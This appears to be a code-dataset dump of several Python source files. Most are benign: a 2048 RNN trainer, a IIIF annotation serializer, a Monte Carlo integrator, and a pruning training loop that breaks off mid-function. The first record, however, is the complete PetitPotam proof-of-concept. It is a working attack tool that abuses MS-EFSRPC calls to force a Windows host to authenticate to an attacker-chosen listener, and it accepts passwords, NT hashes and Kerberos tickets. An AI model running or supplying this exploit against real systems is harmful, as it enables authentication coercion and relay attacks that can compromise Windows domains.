Dataset schema (33 columns, one record per source file; ⌀ marks columns that contain null values):

| column | type | observed range |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 7 to 1.04M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 4 to 247 |
| max_stars_repo_name | string | length 4 to 125 |
| max_stars_repo_head_hexsha | string | length 40 to 78 |
| max_stars_repo_licenses | list | length 1 to 10 |
| max_stars_count | int64 ⌀ | 1 to 368k |
| max_stars_repo_stars_event_min_datetime | string ⌀ | length 24 |
| max_stars_repo_stars_event_max_datetime | string ⌀ | length 24 |
| max_issues_repo_path | string | length 4 to 247 |
| max_issues_repo_name | string | length 4 to 125 |
| max_issues_repo_head_hexsha | string | length 40 to 78 |
| max_issues_repo_licenses | list | length 1 to 10 |
| max_issues_count | int64 ⌀ | 1 to 116k |
| max_issues_repo_issues_event_min_datetime | string ⌀ | length 24 |
| max_issues_repo_issues_event_max_datetime | string ⌀ | length 24 |
| max_forks_repo_path | string | length 4 to 247 |
| max_forks_repo_name | string | length 4 to 125 |
| max_forks_repo_head_hexsha | string | length 40 to 78 |
| max_forks_repo_licenses | list | length 1 to 10 |
| max_forks_count | int64 ⌀ | 1 to 105k |
| max_forks_repo_forks_event_min_datetime | string ⌀ | length 24 |
| max_forks_repo_forks_event_max_datetime | string ⌀ | length 24 |
| content | string | length 1 to 1.04M |
| avg_line_length | float64 | 1.77 to 618k |
| max_line_length | int64 | 1 to 1.02M |
| alphanum_fraction | float64 | 0 to 1 |
| original_content | string | length 7 to 1.04M |
| filtered:remove_function_no_docstring | int64 | -102 to 942k |
| filtered:remove_class_no_docstring | int64 | -354 to 977k |
| filtered:remove_delete_markers | int64 | 0 to 60.1k |
hexsha: 30737425867bb55a2af14436ac1b6d6839ca34e3 | size: 16,368 | ext: py | lang: Python
repo_path: modules/exploit/use/petitpotam.py | repo_name: astar-security/MaeGeri | repo_head_hexsha: b28b37fe1cb8c4f650b8a4c9019636c540262fda | repo_licenses: ["Apache-2.0"] (identical across the max_stars, max_issues, and max_forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null | all stars/issues/forks event datetimes: null
content:
#!/usr/bin/env python
#
# Author: GILLES Lionel aka topotam (@topotam77)
#
# Greetz : grenadine(@Greynardine), skar(@__skar), didakt(@inf0sec1), plissken, pixis(@HackAndDo), shutd0wn(@ _nwodtuhs)
# "Most of" the code stolen from dementor.py from @3xocyte ;)
import sys
import argparse
from impacket import system_errors
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.uuid import uuidtup_to_bin
show_banner = '''
___ _ _ _ ___ _
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
'''
################################################################################
# STRUCTURES
################################################################################
################################################################################
# RPC CALLS
################################################################################
#class EfsRpcQueryProtectors(NDRCALL):
# opnum = 21
# structure = (
# ('FileName', WSTR),
# ('ppProtectorList', PENCRYPTION_PROTECTOR_LIST),
# )
#class EfsRpcQueryProtectorsResponse(NDRCALL):
# structure = (
# ('ErrorCode', ULONG),
# )
################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS = {
0 : (EfsRpcOpenFileRaw, EfsRpcOpenFileRawResponse),
4 : (EfsRpcEncryptFileSrv, EfsRpcEncryptFileSrvResponse),
5 : (EfsRpcDecryptFileSrv, EfsRpcDecryptFileSrvResponse),
6 : (EfsRpcQueryUsersOnFile, EfsRpcQueryUsersOnFileResponse),
7 : (EfsRpcQueryRecoveryAgents, EfsRpcQueryRecoveryAgentsResponse),
8 : (EfsRpcRemoveUsersFromFile, EfsRpcRemoveUsersFromFileResponse),
9 : (EfsRpcAddUsersToFile, EfsRpcAddUsersToFileResponse),
12 : (EfsRpcFileKeyInfo, EfsRpcFileKeyInfoResponse),
13 : (EfsRpcDuplicateEncryptionInfoFile, EfsRpcDuplicateEncryptionInfoFileResponse),
15 : (EfsRpcAddUsersToFileEx, EfsRpcAddUsersToFileExResponse),
16 : (EfsRpcFileKeyInfoEx, EfsRpcFileKeyInfoExResponse),
18 : (EfsRpcGetEncryptedFileMetadata, EfsRpcGetEncryptedFileMetadataResponse),
19 : (EfsRpcSetEncryptedFileMetadata, EfsRpcSetEncryptedFileMetadataResponse),
21 : (EfsRpcEncryptFileExSrv, EfsRpcEncryptFileExSrvResponse),
# 22 : (EfsRpcQueryProtectors, EfsRpcQueryProtectorsResponse),
}
if __name__ == '__main__':
main()
avg_line_length: 36.454343 | max_line_length: 243 | alphanum_fraction: 0.574047
original_content:
#!/usr/bin/env python
#
# Author: GILLES Lionel aka topotam (@topotam77)
#
# Greetz : grenadine(@Greynardine), skar(@__skar), didakt(@inf0sec1), plissken, pixis(@HackAndDo), shutd0wn(@ _nwodtuhs)
# "Most of" the code stolen from dementor.py from @3xocyte ;)
import sys
import argparse
from impacket import system_errors
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.uuid import uuidtup_to_bin
show_banner = '''
___ _ _ _ ___ _
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
'''
class DCERPCSessionError(DCERPCException):
def __init__(self, error_string=None, error_code=None, packet=None):
DCERPCException.__init__(self, error_string, error_code, packet)
def __str__( self ):
key = self.error_code
if key in system_errors.ERROR_MESSAGES:
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
return 'EFSR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
else:
return 'EFSR SessionError: unknown error code: 0x%x' % self.error_code
################################################################################
# STRUCTURES
################################################################################
class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
align = 1
structure = (
('Data', '20s'),
)
class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
align = 1
structure = (
('Data', '20s'),
)
class EFS_EXIM_PIPE(NDRSTRUCT):
align = 1
structure = (
('Data', ':'),
)
class EFS_HASH_BLOB(NDRSTRUCT):
structure = (
('Data', DWORD),
('cbData', PCHAR),
)
class EFS_RPC_BLOB(NDRSTRUCT):
structure = (
('Data', DWORD),
('cbData', PCHAR),
)
class EFS_CERTIFICATE_BLOB(NDRSTRUCT):
structure = (
('Type', DWORD),
('Data', DWORD),
('cbData', PCHAR),
)
class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
structure = (
('Lenght', DWORD),
('SID', RPC_SID),
('Hash', EFS_HASH_BLOB),
('Display', LPWSTR),
)
class ENCRYPTION_CERTIFICATE(NDRSTRUCT):
structure = (
('Lenght', DWORD),
('SID', RPC_SID),
('Hash', EFS_CERTIFICATE_BLOB),
)
class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
align = 1
structure = (
('Cert', DWORD),
('Users', ENCRYPTION_CERTIFICATE_HASH),
)
class ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT):
structure = (
('Type', DWORD),
('HASH', ENCRYPTION_CERTIFICATE_HASH_LIST),
('Certif', ENCRYPTION_CERTIFICATE),
('Blob', EFS_RPC_BLOB),
)
class EFS_RPC_BLOB(NDRSTRUCT):
structure = (
('Data', DWORD),
('cbData', PCHAR),
)
class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
align = 1
structure = (
('Data', ':'),
)
################################################################################
# RPC CALLS
################################################################################
class EfsRpcOpenFileRaw(NDRCALL):
opnum = 0
structure = (
('fileName', WSTR),
('Flag', ULONG),
)
class EfsRpcOpenFileRawResponse(NDRCALL):
structure = (
('hContext', EXIMPORT_CONTEXT_HANDLE),
('ErrorCode', ULONG),
)
class EfsRpcEncryptFileSrv(NDRCALL):
opnum = 4
structure = (
('FileName', WSTR),
)
class EfsRpcEncryptFileSrvResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcDecryptFileSrv(NDRCALL):
opnum = 5
structure = (
('FileName', WSTR),
('Flag', ULONG),
)
class EfsRpcDecryptFileSrvResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcQueryUsersOnFile(NDRCALL):
opnum = 6
structure = (
('FileName', WSTR),
)
class EfsRpcQueryUsersOnFileResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcQueryRecoveryAgents(NDRCALL):
opnum = 7
structure = (
('FileName', WSTR),
)
class EfsRpcQueryRecoveryAgentsResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcRemoveUsersFromFile(NDRCALL):
opnum = 8
structure = (
('FileName', WSTR),
('Users', ENCRYPTION_CERTIFICATE_HASH_LIST)
)
class EfsRpcRemoveUsersFromFileResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcAddUsersToFile(NDRCALL):
opnum = 9
structure = (
('FileName', WSTR),
('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST)
)
class EfsRpcAddUsersToFileResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcFileKeyInfo(NDRCALL):
opnum = 12
structure = (
('FileName', WSTR),
('infoClass', DWORD),
)
class EfsRpcFileKeyInfoResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcDuplicateEncryptionInfoFile(NDRCALL):
opnum = 13
structure = (
('SrcFileName', WSTR),
('DestFileName', WSTR),
('dwCreationDisposition', DWORD),
('dwAttributes', DWORD),
('RelativeSD', EFS_RPC_BLOB),
('bInheritHandle', BOOL),
)
class EfsRpcDuplicateEncryptionInfoFileResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcAddUsersToFileEx(NDRCALL):
opnum = 15
structure = (
('dwFlags', DWORD),
('Reserved', EFS_RPC_BLOB),
('FileName', WSTR),
('dwAttributes', DWORD),
('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST),
)
class EfsRpcAddUsersToFileExResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcFileKeyInfoEx(NDRCALL):
opnum = 16
structure = (
('dwFileKeyInfoFlags', DWORD),
('Reserved', EFS_RPC_BLOB),
('FileName', WSTR),
('InfoClass', DWORD),
)
class EfsRpcFileKeyInfoExResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcGetEncryptedFileMetadata(NDRCALL):
opnum = 18
structure = (
('FileName', WSTR),
)
class EfsRpcGetEncryptedFileMetadataResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcSetEncryptedFileMetadata(NDRCALL):
opnum = 19
structure = (
('FileName', WSTR),
('OldEfsStreamBlob', EFS_RPC_BLOB),
('NewEfsStreamBlob', EFS_RPC_BLOB),
('NewEfsSignature', ENCRYPTED_FILE_METADATA_SIGNATURE),
)
class EfsRpcSetEncryptedFileMetadataResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcEncryptFileExSrv(NDRCALL):
opnum = 21
structure = (
('FileName', WSTR),
('ProtectorDescriptor', WSTR),
('Flags', ULONG),
)
class EfsRpcEncryptFileExSrvResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
#class EfsRpcQueryProtectors(NDRCALL):
# opnum = 21
# structure = (
# ('FileName', WSTR),
# ('ppProtectorList', PENCRYPTION_PROTECTOR_LIST),
# )
#class EfsRpcQueryProtectorsResponse(NDRCALL):
# structure = (
# ('ErrorCode', ULONG),
# )
################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS = {
0 : (EfsRpcOpenFileRaw, EfsRpcOpenFileRawResponse),
4 : (EfsRpcEncryptFileSrv, EfsRpcEncryptFileSrvResponse),
5 : (EfsRpcDecryptFileSrv, EfsRpcDecryptFileSrvResponse),
6 : (EfsRpcQueryUsersOnFile, EfsRpcQueryUsersOnFileResponse),
7 : (EfsRpcQueryRecoveryAgents, EfsRpcQueryRecoveryAgentsResponse),
8 : (EfsRpcRemoveUsersFromFile, EfsRpcRemoveUsersFromFileResponse),
9 : (EfsRpcAddUsersToFile, EfsRpcAddUsersToFileResponse),
12 : (EfsRpcFileKeyInfo, EfsRpcFileKeyInfoResponse),
13 : (EfsRpcDuplicateEncryptionInfoFile, EfsRpcDuplicateEncryptionInfoFileResponse),
15 : (EfsRpcAddUsersToFileEx, EfsRpcAddUsersToFileExResponse),
16 : (EfsRpcFileKeyInfoEx, EfsRpcFileKeyInfoExResponse),
18 : (EfsRpcGetEncryptedFileMetadata, EfsRpcGetEncryptedFileMetadataResponse),
19 : (EfsRpcSetEncryptedFileMetadata, EfsRpcSetEncryptedFileMetadataResponse),
21 : (EfsRpcEncryptFileExSrv, EfsRpcEncryptFileExSrvResponse),
# 22 : (EfsRpcQueryProtectors, EfsRpcQueryProtectorsResponse),
}
class CoerceAuth():
def connect(self, username, password, domain, lmhash, nthash, target, pipe, doKerberos, dcHost, targetIp):
binding_params = {
'lsarpc': {
'stringBinding': r'ncacn_np:%s[\PIPE\lsarpc]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'efsr': {
'stringBinding': r'ncacn_np:%s[\PIPE\efsrpc]' % target,
'MSRPC_UUID_EFSR': ('df1941c5-fe89-4e79-bf10-463657acf44d', '1.0')
},
'samr': {
'stringBinding': r'ncacn_np:%s[\PIPE\samr]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'lsass': {
'stringBinding': r'ncacn_np:%s[\PIPE\lsass]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'netlogon': {
'stringBinding': r'ncacn_np:%s[\PIPE\netlogon]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
}
rpctransport = transport.DCERPCTransportFactory(binding_params[pipe]['stringBinding'])
if hasattr(rpctransport, 'set_credentials'):
rpctransport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)
if doKerberos:
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
if targetIp:
rpctransport.setRemoteHost(targetIp)
dce = rpctransport.get_dce_rpc()
#dce.set_auth_type(RPC_C_AUTHN_WINNT)
#dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
print("[-] Connecting to %s" % binding_params[pipe]['stringBinding'])
try:
dce.connect()
except Exception as e:
print("Something went wrong, check error status => %s" % str(e))
sys.exit()
print("[+] Connected!")
print("[+] Binding to %s" % binding_params[pipe]['MSRPC_UUID_EFSR'][0])
try:
dce.bind(uuidtup_to_bin(binding_params[pipe]['MSRPC_UUID_EFSR']))
except Exception as e:
print("Something went wrong, check error status => %s" % str(e))
sys.exit()
print("[+] Successfully bound!")
return dce
def EfsRpcOpenFileRaw(self, dce, listener):
print("[-] Sending EfsRpcOpenFileRaw!")
try:
request = EfsRpcOpenFileRaw()
request['fileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
request['Flag'] = 0
#request.dump()
resp = dce.request(request)
except Exception as e:
if str(e).find('ERROR_BAD_NETPATH') >= 0:
print('[+] Got expected ERROR_BAD_NETPATH exception!!')
print('[+] Attack worked!')
sys.exit()
if str(e).find('rpc_s_access_denied') >= 0:
print('[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!')
print('[+] OK! Using unpatched function!')
print("[-] Sending EfsRpcEncryptFileSrv!")
try:
request = EfsRpcEncryptFileSrv()
request['FileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
resp = dce.request(request)
except Exception as e:
if str(e).find('ERROR_BAD_NETPATH') >= 0:
print('[+] Got expected ERROR_BAD_NETPATH exception!!')
print('[+] Attack worked!')
pass
else:
print("Something went wrong, check error status => %s" % str(e))
sys.exit()
else:
print("Something went wrong, check error status => %s" % str(e))
sys.exit()
def main():
parser = argparse.ArgumentParser(add_help = True, description = "PetitPotam - rough PoC to connect to lsarpc and elicit machine account authentication via MS-EFSRPC EfsRpcOpenFileRaw()")
parser.add_argument('-u', '--username', action="store", default='', help='valid username')
parser.add_argument('-p', '--password', action="store", default='', help='valid password (if omitted, it will be asked unless -no-pass)')
parser.add_argument('-d', '--domain', action="store", default='', help='valid domain name')
parser.add_argument('-hashes', action="store", metavar="[LMHASH]:NTHASH", help='NT/LM hashes (LM hash can be empty)')
parser.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
parser.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
parser.add_argument('-dc-ip', action="store", metavar="ip address", help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter')
parser.add_argument('-target-ip', action='store', metavar="ip address",
help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
'This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it')
parser.add_argument('-pipe', action="store", choices=['efsr', 'lsarpc', 'samr', 'netlogon', 'lsass'], default='lsarpc', help='Named pipe to use (default: lsarpc)')
parser.add_argument('listener', help='ip address or hostname of listener')
parser.add_argument('target', help='ip address or hostname of target')
options = parser.parse_args()
if options.hashes is not None:
lmhash, nthash = options.hashes.split(':')
else:
lmhash = ''
nthash = ''
print(show_banner)
if options.password == '' and options.username != '' and options.hashes is None and options.no_pass is not True:
from getpass import getpass
options.password = getpass("Password:")
plop = CoerceAuth()
dce = plop.connect(username=options.username, password=options.password, domain=options.domain, lmhash=lmhash, nthash=nthash, target=options.target, pipe=options.pipe, doKerberos=options.k, dcHost=options.dc_ip, targetIp=options.target_ip)
plop.EfsRpcOpenFileRaw(dce, options.listener)
dce.disconnect()
sys.exit()
if __name__ == '__main__':
main()
filtered:remove_function_no_docstring: 7,103 | filtered:remove_class_no_docstring: 4,628 | filtered:remove_delete_markers: 1,111
hexsha: 2d3ca8371c21a92681fe90abff723c44bebc3c0d | size: 3,045 | ext: py | lang: Python
repo_path: game2048/RNN_training.py | repo_name: fuuuyuuu/2048-api | repo_head_hexsha: d96aa0bc7099e8ce7b792ec2b1051a44b4325eec | repo_licenses: ["Apache-2.0"] (identical across the max_stars, max_issues, and max_forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null | all stars/issues/forks event datetimes: null
content:
import torch
from torch import nn
import torchvision.transforms as transforms
import matplotlib.pyplot as plt
from data_loader import data_load
from torch.autograd import Variable
import numpy as np
# torch.manual_seed(1) # reproducible
# Hyper Parameters
EPOCH = 20 # train the training data n times, to save time, we just train 1 epoch
BATCH_SIZE = 6400
TIME_STEP = 4 # rnn time step / image height
INPUT_SIZE = 4 # rnn input size / image width
global LR;
LR = 0.001 # learning rate\
if __name__ == '__main__':
main()
avg_line_length: 31.71875 | max_line_length: 110 | alphanum_fraction: 0.587521
original_content:
import torch
from torch import nn
import torchvision.transforms as transforms
import matplotlib.pyplot as plt
from data_loader import data_load
from torch.autograd import Variable
import numpy as np
# torch.manual_seed(1) # reproducible
# Hyper Parameters
EPOCH = 20 # train the training data n times, to save time, we just train 1 epoch
BATCH_SIZE = 6400
TIME_STEP = 4 # rnn time step / image height
INPUT_SIZE = 4 # rnn input size / image width
global LR;
LR = 0.001 # learning rate\
def DataLoad():
# board_data loading with a batche size
train_data = data_load(data_root = 'Train.csv', data_tensor = transforms.Compose([transforms.ToTensor()]))
X_train = torch.utils.data.DataLoader(train_data, batch_size=BATCH_SIZE, shuffle=True, num_workers=0)
# test_data = data_load(data_root='Test.csv', data_tensor=transforms.Compose([transforms.ToTensor()]))
# X_test = torch.utils.data.DataLoader(test_data, batch_size=BATCH_SIZE, shuffle=True, num_workers=0)
return X_train
class RNN(nn.Module):
def __init__(self):
super(RNN, self).__init__()
self.my_rnn = nn.LSTM(
input_size=INPUT_SIZE,
hidden_size=512,
num_layers=4,
batch_first=True
)
self.out = nn.Linear(512, 4)
def forward(self, x):
r_out, (h_n, h_c) = self.my_rnn(x,None)
out = self.out(r_out[:, -1 ,:])
return out
def main():
global LR;
rnn_training = RNN()
train_data = DataLoad()
optimizer = torch.optim.Adam(rnn_training.parameters(), lr=LR)
loss_func = nn.CrossEntropyLoss()
for epoch in range(EPOCH):
if epoch == 10:
LR = 0.0001
optimizer = torch.optim.Adam(rnn_training.parameters(), lr=LR)
for step, (train, target) in enumerate(train_data):
target = target.long();
b_x = Variable(train.view(-1,4,4))
# print(b_x.shape)
b_y = Variable(target)
if torch.cuda.is_available():
b_x = Variable(b_x).cuda()
b_y = b_y.cuda()
rnn_training = rnn_training.cuda()
optimizer.zero_grad()
output = rnn_training(b_x)
loss = loss_func(output, b_y)
loss.backward()
optimizer.step()
if step % 50 == 0:
train_output = output # (samples, time_step, input_size)
# pred_y = torch.max(train_output, 1)[1].data
pred_y = train_output.data.max(1)[1]
# print(type(pred_y), type(target))
num = (pred_y.eq(b_y.data).sum())
accuracy = 100*num / 6400
print('Epoch: ', epoch, '| train loss: %.4f' % loss, '| test accuracy: %.2f' % accuracy)
torch.save(rnn_training,'rnn_model_b'+str(epoch)+'.pkl')
torch.save(rnn_training, 'rnn_model_final.pkl')
if __name__ == '__main__':
main()
filtered:remove_function_no_docstring: 2,344 | filtered:remove_class_no_docstring: 0 | filtered:remove_delete_markers: 122
hexsha: ce512afce118edf2c22282a539009707e00c705b | size: 1,877 | ext: py | lang: Python
repo_path: apps/iiif/serializers/annotation_list.py | repo_name: ecds/readux | repo_head_hexsha: 4eac8b48efef8126f4f2be28b5eb943c85a89c2e | repo_licenses: ["Apache-2.0"] (identical across the max_stars, max_issues, and max_forks column groups)
max_stars_count: 18 | stars events: 2017-06-12T09:58:02.000Z to 2021-10-01T11:14:34.000Z
max_issues_count: 276 | issues events: 2019-04-26T20:13:01.000Z to 2022-03-31T10:26:28.000Z
max_forks_count: 7 | forks events: 2018-03-13T23:44:26.000Z to 2021-09-15T17:54:55.000Z
content:
# pylint: disable = attribute-defined-outside-init, too-few-public-methods
"""Module for serializing IIIF Annotation Lists"""
import json
from django.core.serializers import serialize
from django.core.serializers.base import SerializerDoesNotExist
from .base import Serializer as JSONSerializer
from django.contrib.auth import get_user_model
from django.db.models import Q
import config.settings.local as settings
USER = get_user_model()
class Serializer(JSONSerializer):
"""
IIIF V2 Annotation List https://iiif.io/api/presentation/2.1/#annotation-list
"""
class Deserializer:
"""Deserialize IIIF Annotation List
:raises SerializerDoesNotExist: Not yet implemented.
"""
avg_line_length: 36.096154 | max_line_length: 90 | alphanum_fraction: 0.583378
original_content:
# pylint: disable = attribute-defined-outside-init, too-few-public-methods
"""Module for serializing IIIF Annotation Lists"""
import json
from django.core.serializers import serialize
from django.core.serializers.base import SerializerDoesNotExist
from .base import Serializer as JSONSerializer
from django.contrib.auth import get_user_model
from django.db.models import Q
import config.settings.local as settings
USER = get_user_model()
class Serializer(JSONSerializer):
"""
IIIF V2 Annotation List https://iiif.io/api/presentation/2.1/#annotation-list
"""
def _init_options(self):
super()._init_options()
self.owners = self.json_kwargs.pop('owners', 0)
def get_dump_object(self, obj):
# TODO: Add more validation checks before trying to serialize.
if self.version == 'v2' or self.version is None:
data = {
"@context": "http://iiif.io/api/presentation/2/context.json",
"@id": '{h}/iiif/v2/{m}/list/{c}'.format(
h=settings.HOSTNAME,
m=obj.manifest.pid,
c=obj.pid
),
"@type": "sc:AnnotationList",
"resources": json.loads(
serialize(
'annotation',
obj.annotation_set.filter(
Q(owner=USER.objects.get(username='ocr')) |
Q(owner__in=self.owners)
),
is_list=True)
)
}
return data
return None
class Deserializer:
"""Deserialize IIIF Annotation List
:raises SerializerDoesNotExist: Not yet implemented.
"""
def __init__(self, *args, **kwargs):
raise SerializerDoesNotExist("annotation_list is a serialization-only serializer")
filtered:remove_function_no_docstring: 1,099 | filtered:remove_class_no_docstring: 0 | filtered:remove_delete_markers: 79
hexsha: ec30a32c1bd8adc81def1f3444251698d0bc0811 | size: 26 | ext: py | lang: Python
repo_path: tranco/__init__.py | repo_name: ZeroSum24/tranco-python-package | repo_head_hexsha: f9aeebaa0d25946323646886f1110cec197e0f54 | repo_licenses: ["MIT"] (identical across the max_stars, max_issues, and max_forks column groups)
max_stars_count: 12 | stars events: 2019-05-24T17:17:07.000Z to 2021-05-11T11:25:04.000Z
max_issues_count: 6 | issues events: 2019-06-11T21:10:42.000Z to 2021-01-25T08:05:09.000Z
max_forks_count: 3 | forks events: 2019-02-26T15:17:54.000Z to 2021-08-21T16:53:34.000Z
content:
from .tranco import Tranco
avg_line_length: 26 | max_line_length: 26 | alphanum_fraction: 0.846154
original_content:
from .tranco import Tranco
filtered:remove_function_no_docstring: 0 | filtered:remove_class_no_docstring: 0 | filtered:remove_delete_markers: 0
hexsha: 6ace6f1e7b2b5d4ff7aa95d88b4bbe251e459eca | size: 575 | ext: py | lang: Python
repo_path: FOMMS_integrate/stochastic.py | repo_name: nschieber/FOMMS_integrate | repo_head_hexsha: 87456d476ecee45b8a06782da12baa1ce4c08e88 | repo_licenses: ["BSD-3-Clause"] (identical across the max_stars, max_issues, and max_forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null | all stars/issues/forks event datetimes: null
content:
"""
This function implements 1d Monte Carlo integration
"""
import numpy as np
def monte_1d(x, f, trials):
"""
Compute a 1D definite integral
Parameters
----------
f : function
User defined function.
x : numpy array
Integration domain.
trials : integer
Total number of generated random samples.
Returns
-------
I : float
Integration result.
"""
a = x[0]
b = x[1]
d = (b - a) * np.random.rand(1, trials) + a
y = f(d)
print('Test addition')
return (b-a) * np.sum(y) / trials
avg_line_length: 19.166667 | max_line_length: 52 | alphanum_fraction: 0.553043
original_content:
"""
This function implements 1d Monte Carlo integration
"""
import numpy as np
def monte_1d(x, f, trials):
"""
Compute a 1D definite integral
Parameters
----------
f : function
User defined function.
x : numpy array
Integration domain.
trials : integer
Total number of generated random samples.
Returns
-------
I : float
Integration result.
"""
a = x[0]
b = x[1]
d = (b - a) * np.random.rand(1, trials) + a
y = f(d)
print('Test addition')
return (b-a) * np.sum(y) / trials
filtered:remove_function_no_docstring: 0 | filtered:remove_class_no_docstring: 0 | filtered:remove_delete_markers: 0
hexsha: 138fa2e645bcd4f89b72e76fa68172d58825add1 | size: 3,047 | ext: py | lang: Python
repo_path: snip/train.py | repo_name: 3846chs/SNIP | repo_head_hexsha: de1771cf4c90edeaa9924ed406293b48ceece7a2 | repo_licenses: ["MIT"] (identical across the max_stars, max_issues, and max_forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null | all stars/issues/forks event datetimes: null
content:
import os
import tensorflow.compat.v1 as tf
import time
import numpy as np
# np.random._bit_generator = np.random.bit_generator
from augment import augment
avg_line_length: 45.477612 | max_line_length: 99 | alphanum_fraction: 0.596652
original_content:
import os
import tensorflow.compat.v1 as tf
import time
import numpy as np
# np.random._bit_generator = np.random.bit_generator
from augment import augment
def train(args, model, sess, dataset):
print('|========= START TRAINING =========|')
if not os.path.isdir(args.path_summary): os.makedirs(args.path_summary)
if not os.path.isdir(args.path_model): os.makedirs(args.path_model)
saver = tf.train.Saver()
random_state = np.random.RandomState(9)
writer = {}
writer['train'] = tf.summary.FileWriter(args.path_summary + '/train', sess.graph)
writer['val'] = tf.summary.FileWriter(args.path_summary + '/val')
t_start = time.time()
best_val_loss = 100
for itr in range(args.train_iterations):
batch = dataset.get_next_batch('train', args.training_batch_size)
batch = augment(batch, args.aug_kinds, random_state)
feed_dict = {}
feed_dict.update({model.inputs[key]: batch[key] for key in ['input', 'label']})
feed_dict.update({model.compress: False, model.is_train: True, model.pruned: True})
input_tensors = [model.outputs] # always execute the graph outputs
if (itr+1) % args.check_interval == 0:
input_tensors.extend([model.summ_op, model.sparsity])
input_tensors.extend([model.train_op])
result = sess.run(input_tensors, feed_dict)
# Check on validation set.
if (itr+1) % args.check_interval == 0:
batch = dataset.get_next_batch('val', args.training_batch_size)
batch = augment(batch, args.aug_kinds, random_state)
feed_dict = {}
feed_dict.update({model.inputs[key]: batch[key] for key in ['input', 'label']})
feed_dict.update({model.compress: False, model.is_train: False, model.pruned: True})
